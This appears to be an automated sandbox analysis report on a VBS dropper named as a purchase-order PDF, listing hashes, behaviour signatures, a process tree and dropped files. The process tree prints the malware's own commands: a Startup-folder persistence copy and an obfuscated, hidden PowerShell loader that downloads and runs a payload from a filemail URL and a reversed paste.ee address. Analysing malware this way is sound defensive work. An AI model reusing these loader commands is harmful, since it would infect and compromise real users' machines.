Analysis

  • max time kernel
    95s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-11-2024 15:52

General

  • Target

    PO 2725724312_pdf.vbs

  • Size

    12KB

  • MD5

    2c548eb64145d9cd7308584191ff0976

  • SHA1

    f2a0f23393dbe76a37819e3b76b7cb24070d696d

  • SHA256

    879dc95c721b68613a3b30899288749e6331fbe698e823092ee9d89ce2318b1a

  • SHA512

    85d3f5ecab588ae6b715dccd14bfb6f5f2d729ddc5abf2bedb62cd6b3ce5bf3049d2615dade76993e76b683de76f443da93a1f273efe420d1c7bd626379dcf76

  • SSDEEP

    192:k9L/aGdqjaQlUsQRwitSUCUaQlWL3MgZrdGHRkfkI:km/5+ww3ScgZrdGHRk8I

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO 2725724312_pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:3216
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\PO 2725724312_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:5092
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 10
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:4940
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\PO 2725724312_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:376
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggKFtzVHJJbkddJHZFUkJPc2VwUmVmRXJlTmNFKVsxLDNdKydYJy1Kb2lOJycpICgoJ3MnKydoT2ltYWdlVXJsID0gaDVTaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvJysnbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT0yQWFfYlcnKydvOVJlJysndTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyJysnblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBoNVM7c2hPd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtzaE9pbWFnZUJ5dGVzID0gc2hPd2ViQ2xpZW50LkRvd25sb2FkRGF0YShzaE9pJysnbWFnZVVybCk7c2hPaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nJysnXTo6VVRGOC5HZXRTdHJpbmcnKycoc2hPaW1hZ2VCeXRlcyk7c2hPc3RhcnRGbGFnID0gaDVTPDxCQVNFNjRfU1RBUlQ+Pmg1UztzaE9lbmRGbGFnID0gaDVTPDxCQVNFNjRfRU5EPj5oNVM7c2hPc3RhcnRJbmRleCA9IHNoT2ltYWdlVGV4dC5JbmRleE9mKHNoT3N0YXJ0RmxhZyk7c2hPZW5kSW5kZXggPSBzaE9pbWFnZScrJ1RleHQuSW5kZXhPZihzaE9lbmRGbGFnKTtzaE9zdGFydEluJysnZGV4IC1nZSAwIC1hbmQgc2hPZW5kSW5kZXggLWd0IHNoT3N0YXJ0SW5kZXg7c2hPc3RhcnRJbmRleCArPSBzaE8nKydzdGFydEZsYWcuTGVuZ3RoO3NoT2Jhc2U2NExlbmd0aCA9IHNoT2VuZEluZGV4IC0gc2hPc3RhcicrJ3RJbmRleDtzaE9iYXNlNjRDbycrJ21tYW5kID0gc2hPaW1hZ2VUZXh0LlN1YicrJ3N0cmluZyhzaE9zdGFydEluZGV4LCBzaE9iYXMnKydlNjRMZW5ndGgpO3NoT2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKHNoT2JhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBTZHcgRm9yRWFjaC0nKydPYmplY3QgeyBzaE9fIH0pWy0xLi4tKHNoT2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07c2hPY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhzaE9iYXNlNjRSZXZlcnNlZCk7c2hPbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOicrJzpMb2FkKHNoT2NvbW1hJysnbmRCeXRlcyk7c2hPdicrJ2FpJysnTWV0aG8nKydkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChoNVNWQUloNVMpOycrJ3NoT3ZhaU1ldGhvZC5JbnZva2Uoc2hPbnVsbCwgQChoNVMwL3RjcDBSL2QvZWUuZXRzYXAvLzpzcHR0aGg1UywgaDVTZGVzYXRpdmFkb2gnKyc1UywgaDVTZGVzYXRpdmFkb2g1UywgaDVTZGVzYXRpdmFkb2g1UywgaDVTTVNCdWlsZGg1UywgaDVTZGVzYXRpdmFkb2g1UywgaDVTZGVzYXRpdmFkb2g1UyxoNVNkZXNhdGl2YWRvaDVTLGg1U2Rlc2F0aXZhZG9oNVMsaDVTZGVzYXRpdmFkb2g1UyxoNVNkZXNhdGl2YWRvaDVTLGg1JysnU2Rlc2F0aXZhZG9oNVMsaDVTMWg1UyxoNVNkZXNhdGl2YWRvaDUnKydTKSk7JykuUkVwTEFDRSgoW0NoQVJdMTE1K1tDaEFSXTEwNCtbQ2hBUl03OSksJyQnKS5SRXBMQUNFKChbQ2hBUl0xMDQrW0NoQVJdNTMrW0NoQVJdODMpLFtzdHJpbkddW0NoQVJdMzkpLlJFcExBQ0UoJ1NkdycsW3N0cmluR11bQ2hBUl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4736
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( ([sTrInG]$vERBOsepRefEreNcE)[1,3]+'X'-JoiN'') (('s'+'hOimageUrl = h5Shttps://1017.filemail.co'+'m/api/file/get?filekey=2Aa_bW'+'o9Re'+'u45t7BU1kVgsd9pT9pgSSlvStGr'+'nTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f h5S;shOwebClient = New-Object System.Net.WebClient;shOimageBytes = shOwebClient.DownloadData(shOi'+'mageUrl);shOimageText = [System.Text.Encoding'+']::UTF8.GetString'+'(shOimageBytes);shOstartFlag = h5S<<BASE64_START>>h5S;shOendFlag = h5S<<BASE64_END>>h5S;shOstartIndex = shOimageText.IndexOf(shOstartFlag);shOendIndex = shOimage'+'Text.IndexOf(shOendFlag);shOstartIn'+'dex -ge 0 -and shOendIndex -gt shOstartIndex;shOstartIndex += shO'+'startFlag.Length;shObase64Length = shOendIndex - shOstar'+'tIndex;shObase64Co'+'mmand = shOimageText.Sub'+'string(shOstartIndex, shObas'+'e64Length);shObase64Reversed = -join (shOba'+'se64Command.ToCharArray() Sdw ForEach-'+'Object { shO_ })[-1..-(shObase64Command.Length)];shOcommandBytes = [System.Convert]::FromBase64String(shObase64Reversed);shOloadedAssembly = [System.Reflection.Assembly]:'+':Load(shOcomma'+'ndBytes);shOv'+'ai'+'Metho'+'d = [dnlib.IO.Home].GetMethod(h5SVAIh5S);'+'shOvaiMethod.Invoke(shOnull, @(h5S0/tcp0R/d/ee.etsap//:sptthh5S, h5Sdesativadoh'+'5S, h5Sdesativadoh5S, h5Sdesativadoh5S, h5SMSBuildh5S, h5Sdesativadoh5S, h5Sdesativadoh5S,h5Sdesativadoh5S,h5Sdesativadoh5S,h5Sdesativadoh5S,h5Sdesativadoh5S,h5'+'Sdesativadoh5S,h5S1h5S,h5Sdesativadoh5'+'S));').REpLACE(([ChAR]115+[ChAR]104+[ChAR]79),'$').REpLACE(([ChAR]104+[ChAR]53+[ChAR]83),[strinG][ChAR]39).REpLACE('Sdw',[strinG][ChAR]124) )"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2884

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    6c47b3f4e68eebd47e9332eebfd2dd4e

    SHA1

    67f0b143336d7db7b281ed3de5e877fa87261834

    SHA256

    8c48b1f2338e5b24094821f41121d2221f1cb3200338f46df49f64d1c4bc3e0c

    SHA512

    0acf302a9fc971ef9df65ed42c47ea17828e54dff685f4434f360556fd27cdc26a75069f00dcdc14ba174893c6fd7a2cfd8c6c07be3ce35dafee0a006914eaca

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    69ad79d2dce6f04a93cc45b60125aa14

    SHA1

    25e651728527e9dc6b17e60f134257e8f02c3440

    SHA256

    4ab7f61615d1e3637241e15259f3a6bd2e5adc06b51fd07df3986b279b0b1386

    SHA512

    dfbec81bcea33c1a364daef46a00c88928268b30a5dfe9dfbc4bfaac9747578ae5cfa97761d711703ee0261df538fa8b22695e05e0a9a571046ad96a07578f83

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ii10vq5j.vvt.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/376-1-0x00007FFAAF393000-0x00007FFAAF395000-memory.dmp

    Filesize

    8KB

  • memory/376-2-0x0000022F513D0000-0x0000022F513F2000-memory.dmp

    Filesize

    136KB

  • memory/376-12-0x00007FFAAF390000-0x00007FFAAFE51000-memory.dmp

    Filesize

    10.8MB

  • memory/376-13-0x00007FFAAF390000-0x00007FFAAFE51000-memory.dmp

    Filesize

    10.8MB

  • memory/376-16-0x00007FFAAF390000-0x00007FFAAFE51000-memory.dmp

    Filesize

    10.8MB

  • memory/376-17-0x00007FFAAF390000-0x00007FFAAFE51000-memory.dmp

    Filesize

    10.8MB

  • memory/2884-38-0x000001F4FBC70000-0x000001F4FBDC8000-memory.dmp

    Filesize

    1.3MB